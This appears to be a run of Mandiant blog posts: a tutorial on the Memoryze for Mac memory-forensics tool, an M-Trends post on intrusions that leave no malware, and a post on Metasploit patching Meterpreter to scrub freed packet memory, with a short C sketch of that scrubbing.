Based on the process listing above, we may be interested in getting a more complete understanding of what a particular process may be doing. We can list file descriptors and memory sections for all of the processes in the listing, but this would get pretty lengthy and present too much information at once. Using filters, we can limit the display to a smaller subset or a single process. We can use the "-n" option to filter processes by NAME or the "-p" option to filter processes by PID. Execute the following command:

macmemoryze proclist -w -p 14 -f ~/Documents/my.mem 2>err.txt

In the image above, we show a snippet of a file descriptor listing for PID 14 using the command-line switch "-p 14". This shows us all open file descriptors for the given process. This includes files, UNIX domain sockets, networking sockets (such as TCP), and so on. For several of the types/subtypes, Memoryze™ for the Mac 1.0 will provide a value associated with the item type. The value for a descriptor of type FILE is the filename associated with the file descriptor, while the value for a type SOCKET subtype TCP is the source IP address, destination IP address, and associated ports.

Now that we've completed some filtering, let's dig a little deeper and perform detailed analysis of the "notifyd" process. The image below contains a snippet of its memory sections listing. Memoryze™ for the Mac 1.0 shows us the start and end virtual addresses and a human-readable size for each section. For some memory sections, Memoryze™ for the Mac 1.0 also provides a type, such as MALLOC or IOKIT. These types provide insight into the purpose of the memory section. For other memory sections, Memoryze™ for the Mac 1.0 displays the filename that is located at (or was used to initialize) that particular memory region. Please execute:

macmemoryze proclist -s -p 14 -f ~/Documents/my.mem 2>err.txt

Neat, huh? So now we've analyzed the standard operating system (OS) process list structure. If it's good enough for the OS, it's good enough for us, right? Not really. It's fairly trivial for malware to unlink itself from the process list that the OS maintains. In light of this, Memoryze™ for the Mac 1.0 provides a process carving feature that allows it to enumerate and analyze processes based on their signature in memory. This means that Memoryze™ for the Mac 1.0 does not have to depend on the OS to provide a list of processes, enabling it to discover processes that have been hidden from standard OS listings. This same carving feature extends to the kextlist and syscalllist features, allowing you to discover other hidden data within the OS.

Now don't forget, Memoryze™ for the Mac 1.0 can be run offline using an acquired memory image, or live, analyzing the running system in real time. Below we show a system call table listing using the live memory analysis feature; notice the missing "-f" option. We can use this listing to check for system call table hooking, which allows attackers to surreptitiously monitor or filter user-level programs' interactions with the OS kernel. This is commonly used to hide files and network connections from user-level programs. The syscalllist feature also supports discovery and listing of the Mach trap table. Mach trap, what? The Mach trap table is analogous to the system call table in the BSD portion of OS X, but lives within the Mach portion of OS X, so we want to ensure we can check for possible hooking within that table also. To perform a live listing execute:

sudo macmemoryze syscalllist -s

In order to hook the syscall table, an attacker would probably want to use a driver. Have no fear! Memoryze™ for the Mac 1.0 can carve loaded kexts from memory. A decent malware author would probably want to hide the driver from the OS by unlinking it from internal data structures. To combat this, Memoryze™ for the Mac 1.0 will parse live memory or an acquired image to find loaded drivers, as shown in the screenshot below.

Memoryze™ for the Mac 1.0 supports an XML output option ("-x") that will create an XML file containing an extended version of the console output. "Extended version," you ask? There is only so much console real estate; we must make decisions about what information to display, so some things get left out. For example, we parse the full file path of the executing process and the process arguments. These are not displayed in the console output, but are accessible when using the XML output option. These XML files can also be loaded into Mandiant Redline™ (currently Windows only, boo!) for viewing in a GUI.

There are other features of Memoryze™ for the Mac 1.0 that we have not detailed here, but we don't want to give you all the answers. What's the fun in that? We really want you to use the tool and provide us with some feedback on features, interface, usages, and so on.

Memoryze™ for the Mac 1.0 currently supports:

  • Mac OS X Snow Leopard (10.6) 32/64-bit
  • Mac OS X Lion (10.7) 32/64-bit

We hope to continue to improve the state of Mac memory analysis for incident responders and security professionals.

"Mac" is a trademark of The Apple Corporation. Mandiant is not affiliated with or endorsed by The Apple Corporation.

M-Trends #1: Malware Only Tells Half the Story

When I joined Mandiant earlier this year, I was given the opportunity to help write our annual M-Trends report. This is the third year Mandiant has published the report, which is a summary of the trends we've observed in our investigations over the last twelve months.

I remember reading Mandiant's first M-Trends report when it came out in 2010 and recall being surprised that Mandiant didn't pull any punches. They talked about the advanced persistent threat, or APT (they had been using that term for several years, long before it was considered a cool marketing buzzword), and they were open about the origin of the attacks. The report summarized what I'd been seeing in the industry and offered useful insights for detection and response. Needless to say, I enjoyed the opportunity to work on the latest version.

This year's report details six trends we identified in 2011. We developed the six trends very organically: I spent quite a few days and nights reading all of the reports from our outstanding incident response team and wrote about what we saw; we didn't start with trends and then look for evidence to support them.

If you haven't picked up a copy of the report yet, you can do so here. I will be blogging on each of the six trends over the next two weeks; you can even view the videos we've developed for each trend as each blog post is published:

Malware Only Tells Half the Story.

Of the many systems compromised in each investigation, about half were never touched by attacker malware.

In many cases, the intruders logged into systems and took data from them (or used them as a staging point for exfiltration), but didn't install tools. Ironically, the very systems that hold the data targeted by an attacker are often the least likely to have malware installed on them. While finding the malware used in an intrusion is important, it is impossible to understand the full scope of an intrusion if malware is the focal point of the investigation. We illustrate this with actual examples in the graphical spread on pages 6-7 of the report.

What does this mean for victim organizations?

You could start by looking for malware, but don't end there! A smart incident response process will seek to fully understand the scope of compromise and find all impacted systems in the environment. This could mean finding the registry entries that identify lateral movement, traces of deleted .rar files in unallocated space, or use of a known compromised account. It turns out that Mandiant has a product that does all of this, but the footnote on page 5 is the only mention you'll see in the entire report (and even that was an afterthought).

Thoughts and questions about this trend or the M-Trends report?

The Changing Battlefield in Memory

Steve Davis and I gave a talk at Black Hat and at DEF CON called Metasploit Autopsy: Reconstructing the scene of the crime. Giving the talk was a blast; both Steve and I were thrilled to be given an opportunity to give a defensive security talk on the Metasploit track. During our talk and in several interviews, we stated that some aspects of computer security are a cat and mouse game: when you make a technique, tool, or other knowledge public, people have a chance to analyze what you have done. This analysis can lead to better code, improvements to ideas, or in some cases the breaking of said tools. In the case of the Metasploit Forensic Framework (MSFF), the newest release of Metasploit flat out broke MSFF.

First, let me give you some background. When we first started writing the tool, we quickly realized that breaking MSFF would take a single-line change to Meterpreter, and the fix is simple. In our talk, we discussed that when Meterpreter called free(), the received and sent packets were not scrubbed and lay around in memory for hours. MSFF capitalized on this, using Memoryze to acquire the process's address space, which included the process's freed memory. HD and crew were nice enough to wait to patch Meterpreter until after our talk. Meterpreter was patched Saturday with memset() calls that zero out the packet data before the memory is freed.
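As a hedged illustration of that scrubbing pattern (a minimal sketch, not Meterpreter's actual source; the structure and function names are invented for the example):

#include <stdlib.h>
#include <string.h>

/* Toy packet structure standing in for Meterpreter's; the fields and
 * the destroy function are illustrative only. */
typedef struct {
    unsigned char *data;   /* packet payload */
    size_t length;         /* payload size in bytes */
} packet_t;

void packet_destroy(packet_t *packet)
{
    if (packet == NULL)
        return;
    if (packet->data != NULL) {
        /* Zero the payload before freeing so plaintext command and
         * response data cannot later be carved out of freed heap
         * pages by a tool like MSFF. */
        memset(packet->data, 0, packet->length);
        free(packet->data);
    }
    memset(packet, 0, sizeof(*packet));
    free(packet);
}

int main(void)
{
    packet_t *p = calloc(1, sizeof(*p));
    p->length = 64;
    p->data = malloc(p->length);
    memcpy(p->data, "secret command data", 20);
    packet_destroy(p);   /* payload is zeroed, then freed */
    return 0;
}

One caveat worth noting: an optimizing compiler may elide a memset() on a buffer that is immediately freed, so hardened code typically reaches for SecureZeroMemory() on Windows or explicit_bzero() where available.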

With this fix, our current technique for reconstructing what Meterpreter sent or received no longer works. The Metasploit project has successfully broken that ability (something we expected). Our detection will evolve, and HD discussed some ideas he had to make detecting the Meterpreter binary harder. Currently, MSFF can still be used to identify the injected binaries in a process's address space; the Meterpreter binary contains too much code and has too many features to effectively hide in memory. If and when HD patches the reflective loader to scrub Meterpreter's binary data, we'll update MSFF with a fix, more as a proof of concept than anything else, to continue to identify the injected DLLs. Hope everyone's recovered from Vegas!

Huge thanks go to Ping, Nikita, Jeff Moss, Val Smith, and HD for putting the Metasploit track together. It was not easy, but it went great. Huge thanks also to the DEF CON speakers, who were very flexible.